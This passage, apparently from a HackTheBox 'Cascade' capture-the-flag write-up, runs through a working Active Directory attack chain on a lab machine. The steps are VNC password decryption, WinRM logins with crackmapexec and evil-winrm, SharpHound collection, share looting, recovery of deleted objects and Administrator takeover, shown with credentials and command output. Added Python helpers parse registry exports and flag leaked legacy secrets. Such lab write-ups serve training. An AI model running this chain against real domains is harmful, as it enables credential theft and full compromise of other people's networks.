┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ echo -n "6bcf2a4b6e5aca0f" | xxd -r -p > vnc_hash.bin

                                                                                                                          
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ ./vncpwd vnc_hash.bin                                

Password: sT333ve2
                                                                                                                          
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ 
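Added example, not from the write-up or the vncpwd project: a Python parser for .reg exports that handles the UTF-16 BOM (the two garbage characters cat printed at the top of the file), the dword and hex value types and wrapped hex lines, then pulls out the Password value as the raw 8 bytes the tool expects (the same thing the xxd -r -p step produced) and lists the settings an auditor would flag in this export. The sample export is constructed from a subset of the values above; the line wrap on the Password value is added deliberately to exercise that path.

```python
# Constructed excerpt of a TightVNC "VNC Install.reg" export. regedit writes
# .reg files as UTF-16LE with a byte-order mark, which is what cat rendered
# as two garbage characters; it also wraps long hex values with a trailing
# backslash, done here on purpose. Password bytes are the ones found above.
REG_TEXT = (
    "Windows Registry Editor Version 5.00\r\n"
    "\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\TightVNC\\Server]\r\n"
    "\"RfbPort\"=dword:0000170c\r\n"
    "\"LoopbackOnly\"=dword:00000000\r\n"
    "\"UseVncAuthentication\"=dword:00000001\r\n"
    "\"IpAccessControl\"=\"\"\r\n"
    "\"Password\"=hex:6b,cf,2a,4b,6e,5a,\\\r\n"
    "  ca,0f\r\n"
)
REG_BYTES = b"\xff\xfe" + REG_TEXT.encode("utf-16-le")

TIGHTVNC_SERVER_KEY = "HKEY_LOCAL_MACHINE\\SOFTWARE\\TightVNC\\Server"


def decode_reg(data):
    """regedit exports are UTF-16LE with a BOM; older tools wrote ANSI."""
    if data.startswith(b"\xff\xfe"):
        return data[2:].decode("utf-16-le")
    return data.decode("cp1252")


def parse_value(text):
    """Turn the right-hand side of a .reg line into a Python value."""
    if text.startswith('"') and text.endswith('"'):
        return text[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if text.startswith("dword:"):
        return int(text[6:], 16)
    if text.startswith("hex") and ":" in text:      # hex: or hex(N):
        body = text.split(":", 1)[1]
        return bytes(int(b, 16) for b in body.split(",") if b.strip())
    return text                                     # unknown type: keep raw


def parse_reg(text):
    """Return {key_path: {value_name: value}} for a .reg export."""
    lines = []          # a trailing backslash continues on the next line
    for raw in text.splitlines():
        stripped = raw.strip()
        if lines and lines[-1].endswith("\\"):
            lines[-1] = lines[-1][:-1] + stripped
        else:
            lines.append(stripped)
    tree, key = {}, None
    for line in lines:
        if not line or line.startswith(";") or line.startswith("Windows Registry"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            tree.setdefault(key, {})
            continue
        if key is None:
            continue
        name, _, value = line.partition("=")        # names containing '=' not handled
        name = "@" if name == "@" else name.strip('"')
        tree[key][name] = parse_value(value)
    return tree


def stored_secrets(tree, words=("password", "passwd", "pwd", "secret")):
    """List (key, name, value) for value names that look like credentials."""
    return [(key, name, value)
            for key, values in tree.items()
            for name, value in values.items()
            if any(w in name.lower() for w in words)]


def tightvnc_findings(tree):
    """Findings an auditor would raise for the TightVNC server key."""
    server = tree.get(TIGHTVNC_SERVER_KEY, {})
    findings = []
    if isinstance(server.get("Password"), bytes):
        findings.append("VNC password blob present in export")
    if server.get("LoopbackOnly") == 0:
        findings.append("server reachable beyond localhost (LoopbackOnly=0)")
    if server.get("IpAccessControl") == "":
        findings.append("no IP access-control list configured")
    return findings
```

Writing `parse_reg(...)[TIGHTVNC_SERVER_KEY]["Password"]` to a file with `open(path, "wb")` gives exactly the vnc_hash.bin the tool needed, instead of the hex text that produced the garbage output.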

Run crackmapexec against WinRM with s.smith and the recovered password:

┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ crackmapexec winrm 10.10.10.182 -u s.smith -p sT333ve2
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)
                                                                                                                          
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]

Using evil-winrm we log in as s.smith and read user.txt: 795b883bce48e25112c2183f92466

┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ crackmapexec winrm 10.10.10.182 -u s.smith -p  sT333ve2
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [+] cascade.local\s.smith:sT333ve2 (Pwn3d!)
                                                                                                                          
┌──(kali㉿kali)-[~/HTB/cascade/vncpwd]
└─$ evil-winrm -i 10.10.10.182 -u s.smith -p   sT333ve2
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls
*Evil-WinRM* PS C:\Users\s.smith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\s.smith\Desktop> ls


    Directory: C:\Users\s.smith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/11/2023  10:47 AM             34 user.txt
-a----         2/4/2021   4:24 PM           1031 WinDirStat.lnk


*Evil-WinRM* PS C:\Users\s.smith\Desktop> cat users.txt
Cannot find path 'C:\Users\s.smith\Desktop\users.txt' because it does not exist.
At line:1 char:1
+ cat users.txt
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\s.smith\Desktop\users.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\s.smith\Desktop> cat user.txt
795b883bce48e25112c2183f92466

Privesc

Copy SharpHound (the BloodHound ingestor) into the cascade working folder.

┌──(kali㉿kali)-[~/Downloads]
└─$ cd Bloodhound_3
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ ls
 BloodHound-3.0.5   BloodHound-3.0.5.zip   BloodHound-linux-x64  'BloodHound-linux-x64(1).zip'
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ cd BloodHound-3.0.5
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ ls
appveyor.yml            Ingestors             package-lock.json  webpack.config.development.js
BloodHoundExampleDB.db  LICENSE-3RD-PARTY.md  README.md          webpack.config.production.js
deploy.sh               LICENSE.md            renderer.js
docs                    main.js               server.js
index.html              package.json          src
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ cd Ingestors       
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ ls
DebugBuilds  SharpHound.exe  SharpHound.ps1
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ cp SSharpHound.exe /home/kali/HTB/cascade
cp: cannot stat 'SSharpHound.exe': No such file or directory
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ cp SharpHound.exe /home/kali/HTB/cascade 
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]

Upload SharpHound to the target over evil-winrm, run it there, and download the resulting zip back to Kali.

┌──(kali㉿kali)-[~/HTB/cascade]
└─$ evil-winrm -i 10.10.10.182 -u s.smith -p   sT333ve2
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> upload /home/kali/HTB/cascade/SharpHound.exe
                                        
Info: Uploading /home/kali/HTB/cascade/SharpHound.exe to C:\Users\s.smith\Documents\SharpHound.exe
                                        
Data: 1111380 bytes of 1111380 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls


    Directory: C:\Users\s.smith\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2023  12:51 AM         833536 SharpHound.exe


*Evil-WinRM* PS C:\Users\s.smith\Documents> ./SharpHound.exe
------------------------------------------------
Initializing SharpHound at 12:55 AM on 9/13/2023
------------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain CASCADE.LOCAL using path CN=Schema,CN=Configuration,DC=CASCADE,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 18 MB RAM
Status: 81 objects finished (+81 Infinity)/s -- Using 26 MB RAM
Enumeration finished in 00:00:00.4488100
Compressing data to .\20230913005544_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 12:55 AM on 9/13/2023! Happy Graphing!

*Evil-WinRM* PS C:\Users\s.smith\Documents> ls


    Directory: C:\Users\s.smith\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2023  12:55 AM           9940 20230913005544_BloodHound.zip
-a----        9/13/2023  12:55 AM          14433 OTJmMzFjYTUtNzc3NS00YWZjLWEyODgtYTY3MDg2YzBiNzgx.bin
-a----        9/13/2023  12:51 AM         833536 SharpHound.exe


*Evil-WinRM* PS C:\Users\s.smith\Documents> download 20230913005544_BloodHound.zip
                                        
Info: Downloading C:\Users\s.smith\Documents\20230913005544_BloodHound.zip to 20230913005544_BloodHound.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\s.smith\Documents> 

Started neo4j, ran BloodHound and imported the zip.

Going to try aclpwn to see whether it finds an ACL-based path from s.smith to the domain.

┌──(kali㉿kali)-[~/HTB/cascade]
└─$ ~/.local/bin/aclpwn -f [email protected] -t cascade.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.182 -sp sT333ve2
[!] No path found!
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/cascade]

Check which groups s.smith is in.

*Evil-WinRM* PS C:\Users\s.smith\Documents> net user s.smith
User name                    s.smith
Full Name                    Steve Smith
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/28/2020 8:58:05 PM
Password expires             Never
Password changeable          1/28/2020 8:58:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 MapAuditDrive.vbs
User profile
Home directory
Last logon                   1/29/2020 12:26:39 AM

Logon hours allowed          All

Local Group Memberships      *Audit Share          *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup "Audit Share"
Alias name     Audit Share
Comment        \\Casc-DC1\Audit$

Members

-------------------------------------------------------------------------------
s.smith
The command completed successfully.

*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup IT
Alias name     IT
Comment

Members

-------------------------------------------------------------------------------
arksvc
r.thompson
s.smith
The command completed successfully.

*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup "Remote Management Use"
net.exe : System error 1376 has occurred.
    + CategoryInfo          : NotSpecified: (System error 1376 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

The specified local group does not exist.


Use crackmapexec to enumerate which shares s.smith can access.


┌──(kali㉿kali)-[~/HTB/cascade]
└─$ crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2 --shares
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\s.smith:sT333ve2 
SMB         10.10.10.182    445    CASC-DC1         [+] Enumerated shares
SMB         10.10.10.182    445    CASC-DC1         Share           Permissions     Remark
SMB         10.10.10.182    445    CASC-DC1         -----           -----------     ------
SMB         10.10.10.182    445    CASC-DC1         ADMIN$                          Remote Admin
SMB         10.10.10.182    445    CASC-DC1         Audit$          READ            
SMB         10.10.10.182    445    CASC-DC1         C$                              Default share
SMB         10.10.10.182    445    CASC-DC1         Data            READ            
SMB         10.10.10.182    445    CASC-DC1         IPC$                            Remote IPC
SMB         10.10.10.182    445    CASC-DC1         NETLOGON        READ            Logon server share 
SMB         10.10.10.182    445    CASC-DC1         print$          READ            Printer Drivers
SMB         10.10.10.182    445    CASC-DC1         SYSVOL          READ            Logon server share 
                                                                                                           

We have read access to Audit$. We connect to it with smbclient, and I have downloaded all the files to my Kali.

┌──(kali㉿kali)-[~/HTB/cascade]
└─$ smbclient //10.10.10.182/Audit$ -U s.smith%sT333ve2
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 29 13:01:26 2020
  ..                                  D        0  Wed Jan 29 13:01:26 2020
  CascAudit.exe                      An    13312  Tue Jan 28 16:46:51 2020
  CascCrypto.dll                     An    12288  Wed Jan 29 13:00:20 2020
  DB                                  D        0  Tue Jan 28 16:40:59 2020
  RunAudit.bat                        A       45  Tue Jan 28 18:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 02:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 02:38:38 2019
  x64                                 D        0  Sun Jan 26 17:25:27 2020
  x86                                 D        0  Sun Jan 26 17:25:27 2020

                6553343 blocks of size 4096. 1625087 blocks available
smb: \> cd DB
smb: \DB\> ls
  .                                   D        0  Tue Jan 28 16:40:59 2020
  ..                                  D        0  Tue Jan 28 16:40:59 2020
  Audit.db                           An    24576  Tue Jan 28 16:39:24 2020

                6553343 blocks of size 4096. 1625087 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (11.9 KiloBytes/sec) (average 11.9 KiloBytes/sec)
smb: \DB\> get CascAudit.exe
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \DB\CascAudit.exe
smb: \DB\> cd ../
smb: \> get CascAudit.exe
getting file \CascAudit.exe of size 13312 as CascAudit.exe (9.3 KiloBytes/sec) (average 10.8 KiloBytes/sec)
smb: \> get RunAudit.bat
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.0 KiloBytes/sec) (average 7.3 KiloBytes/sec)
smb: \> get System.Data.SQLite.dll
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (129.4 KiloBytes/sec) (average 50.3 KiloBytes/sec)
smb: \> get System.Data.SQLite.EF6.dll
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (37.8 KiloBytes/sec) (average 45.5 KiloBytes/sec)
smb: \> cd x64
smb: \x64\> ls
  .                                   D        0  Sun Jan 26 17:25:27 2020
  ..                                  D        0  Sun Jan 26 17:25:27 2020
  SQLite.Interop.dll                  A  1639936  Sun Oct 27 02:39:20 2019

                6553343 blocks of size 4096. 1624828 blocks available
smb: \x64\> get SQLite.Interop.dll
getting file \x64\SQLite.Interop.dll of size 1639936 as SQLite.Interop.dll (264.6 KiloBytes/sec) (average 116.5 KiloBytes/sec)
smb: \x64\> cd ../x86
smb: \x86\> ls
  .                                   D        0  Sun Jan 26 17:25:27 2020
  ..                                  D        0  Sun Jan 26 17:25:27 2020
  SQLite.Interop.dll                  A  1246720  Sun Oct 27 02:34:20 2019

                6553343 blocks of size 4096. 1624828 blocks available
smb: \x86\> 

Going to try reading the database and have asked chatGPT how 🙂

sudo apt update
sudo apt install sqlite3

sqlite3 audit.db

.tables

SELECT * FROM DeletedUserAudit;

└─$ sqlite3 Audit.db
SQLite version 3.42.0 2023-05-16 12:36:15
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit  Ldap              Misc            
sqlite> SELECT * FROM DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> SELECT * FROM Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> SELECT * FROM Misc;
sqlite> 


We can check which groups ArkSvc is in.

└─$ evil-winrm -i 10.10.10.182 -u s.smith -p   sT333ve2
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> net user ArkSvc
User name                    arksvc
Full Name                    ArkSvc
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/9/2020 5:18:20 PM
Password expires             Never
Password changeable          1/9/2020 5:18:20 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/29/2020 10:05:40 PM

Logon hours allowed          All

Local Group Memberships      *AD Recycle Bin       *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\s.smith\Documents> 

I asked chatGPT about this output.

Based on the information provided, there are a few key points of interest regarding the ArkSvc user:

Local Group Memberships:

AD Recycle Bin: This is intriguing because if this user has rights to access the Active Directory (AD) Recycle Bin, they may be able to recover deleted AD objects. This could lead to potential privilege escalation or information disclosure vulnerabilities.

I asked chatGPT how to enumerate further and for tips from evil-winrm. But we first need the password.

Load the Active Directory module: Import-Module ActiveDirectory

Enumerate the deleted objects: Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects -Property *

Restore a deleted object (if needed): $deletedUser = Get-ADObject -Filter 'SamAccountName -eq "desired_username"' -IncludeDeletedObjects
Restore-ADObject -Identity $deletedUser.ObjectGuid

How to read the DLL on Kali using dnSpy - tips from chatGPT

wget https://packages.microsoft.com/config/debian/10/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
sudo apt-get update
sudo apt-get install -y apt-transport-https
sudo apt-get update
sudo apt-get install -y dotnet-sdk-3.1

Download and unzip dnSpy from https://github.com/0xd4d/dnSpy/releases

unzip dnSpy-netcore-win64.zip

Run dnSpy:

cd dnSpy-netcore-win64
dotnet dnSpy.dll

Struggled with the above, but found that the password can be decrypted with some custom script on the internet for this box. The password is w3lc0meFr31nd

We try and run the previous commands in evil-winrm as arksvc.

┌──(kali㉿kali)-[~/HTB/cascade]
└─$ evil-winrm -i 10.10.10.182 -u arksvc -p w3lc0meFr31nd
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> Import-Module ActiveDirectory
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects -Property *


accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/CASC-WS1
                                  DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
CN                              : CASC-WS1
                                  DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
codePage                        : 0
countryCode                     : 0
Created                         : 1/9/2020 7:30:19 PM
createTimeStamp                 : 1/9/2020 7:30:19 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM, 1/9/2020 7:30:19 PM, 1/1/1601 12:04:17 AM}
instanceType                    : 4
isCriticalSystemObject          : False
isDeleted                       : True

At the bottom of the output we can see the TempAdmin account.

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : [email protected]
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

We can see a cascadeLegacyPwd value – YmFDVDNyMWFOMDBkbGVz. We try to decode it as base64.

┌──(kali㉿kali)-[~]
└─$ echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ 
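Both the DeletedUserAudit rows and the Get-ADObject output above show the same Active Directory convention: a tombstoned object is renamed to "<name>" followed by a newline and "DEL:<objectGUID>", which sqlite3 prints across two lines and which LDAP hex-escapes as \0A inside the DN. The following Python is an added example, not part of this write-up: it re-joins the sqlite3 rows, parses a Deleted Objects DN in either spelling, and, on the Get-ADObject output, flags non-standard password-like attributes (such as cascadeLegacyPwd) whose value is base64 text, which is the check a defender would run over the Recycle Bin before a tombstone leaks a legacy credential. The sample inputs are constructed from the values shown on this page.

```python
import base64
import re

# Constructed sample: the DeletedUserAudit rows exactly as sqlite3 printed them above.
# The Name column embeds a newline, which is why each row is shown over two lines.
AUDIT_DUMP = """6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local"""

# Constructed excerpt of the Get-ADObject format-list output for TempAdmin (values from the page).
ADOBJECT_DUMP = """cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
DistinguishedName               : CN=TempAdmin\\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin"""

# A tombstoned object is renamed "<RDN>\nDEL:<objectGUID>"; inside an LDAP DN the
# newline is hex-escaped as \0A. The pattern accepts both spellings.
DELETED_RDN = re.compile(
    r"^CN=(?P<name>.+?)(?:\\0A|\n)DEL:"
    r"(?P<guid>[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}),(?P<parent>.+)$",
    re.IGNORECASE,
)
STANDARD_PWD_ATTRS = {"pwdLastSet", "badPwdCount", "badPasswordTime"}  # counters/timestamps, not secrets


def parse_deleted_dn(dn):
    """Split a Deleted Objects DN into original name, objectGUID and container (None if not a tombstone)."""
    m = DELETED_RDN.match(dn)
    return m and {"name": m["name"], "guid": m["guid"].lower(), "parent": m["parent"]}


def parse_audit_dump(text):
    """Re-join rows split by the embedded newline, then split on sqlite3's '|' separator."""
    rows = []
    for line in text.splitlines():
        if line.startswith("DEL:") and rows:
            rows[-1] += "\n" + line          # second half of the Name column
        else:
            rows.append(line)
    records = []
    for row in rows:
        rid, user, name, dn = row.split("|", 3)
        records.append({"id": int(rid), "username": user, "name": name, "dn": parse_deleted_dn(dn)})
    return records


def parse_format_list(text):
    """Parse PowerShell 'Attribute : value' output, joining indented continuation lines with a newline."""
    attrs, last = {}, None
    for line in text.splitlines():
        if line.startswith(" ") and last is not None:
            attrs[last] += "\n" + line.strip()
        elif " : " in line:
            key, _, value = line.partition(" : ")
            last = key.strip()
            attrs[last] = value.strip()
    return attrs


def find_legacy_secrets(attrs):
    """Flag non-standard pwd/pass attributes whose value is strict base64 of printable ASCII."""
    hits = {}
    for name, value in attrs.items():
        if name in STANDARD_PWD_ATTRS or not re.search(r"pwd|pass", name, re.I):
            continue
        try:
            text = base64.b64decode(value, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            continue
        if text.isprintable():
            hits[name] = text
    return hits
```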

Because the email mentioned that this account shared its password with the Administrator, we test the decoded password against the Administrator account.

┌──(kali㉿kali)-[~/HTB/cascade]
└─$ crackmapexec winrm 10.10.10.182 -u Administrator -p baCT3r1aN00dles

SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [+] cascade.local\Administrator:baCT3r1aN00dles (Pwn3d!)
                                                                                                                

Pwned

d-r---        1/28/2020   6:26 PM                Documents
d-r---        1/26/2020  11:56 PM                Downloads
d-r---        1/26/2020  11:56 PM                Favorites
d-r---        1/26/2020  11:56 PM                Links
d-r---        1/26/2020  11:56 PM                Music
d-r---        1/26/2020  11:56 PM                Pictures
d-r---        1/26/2020  11:56 PM                Saved Games
d-r---        1/26/2020  11:56 PM                Searches
d-r---        1/26/2020  11:56 PM                Videos
-a----        3/25/2020  11:17 AM         645729 wds_current_setup.exe


*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/13/2023  12:27 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
e9f7e5fccd0b570fffadd6190b3282f4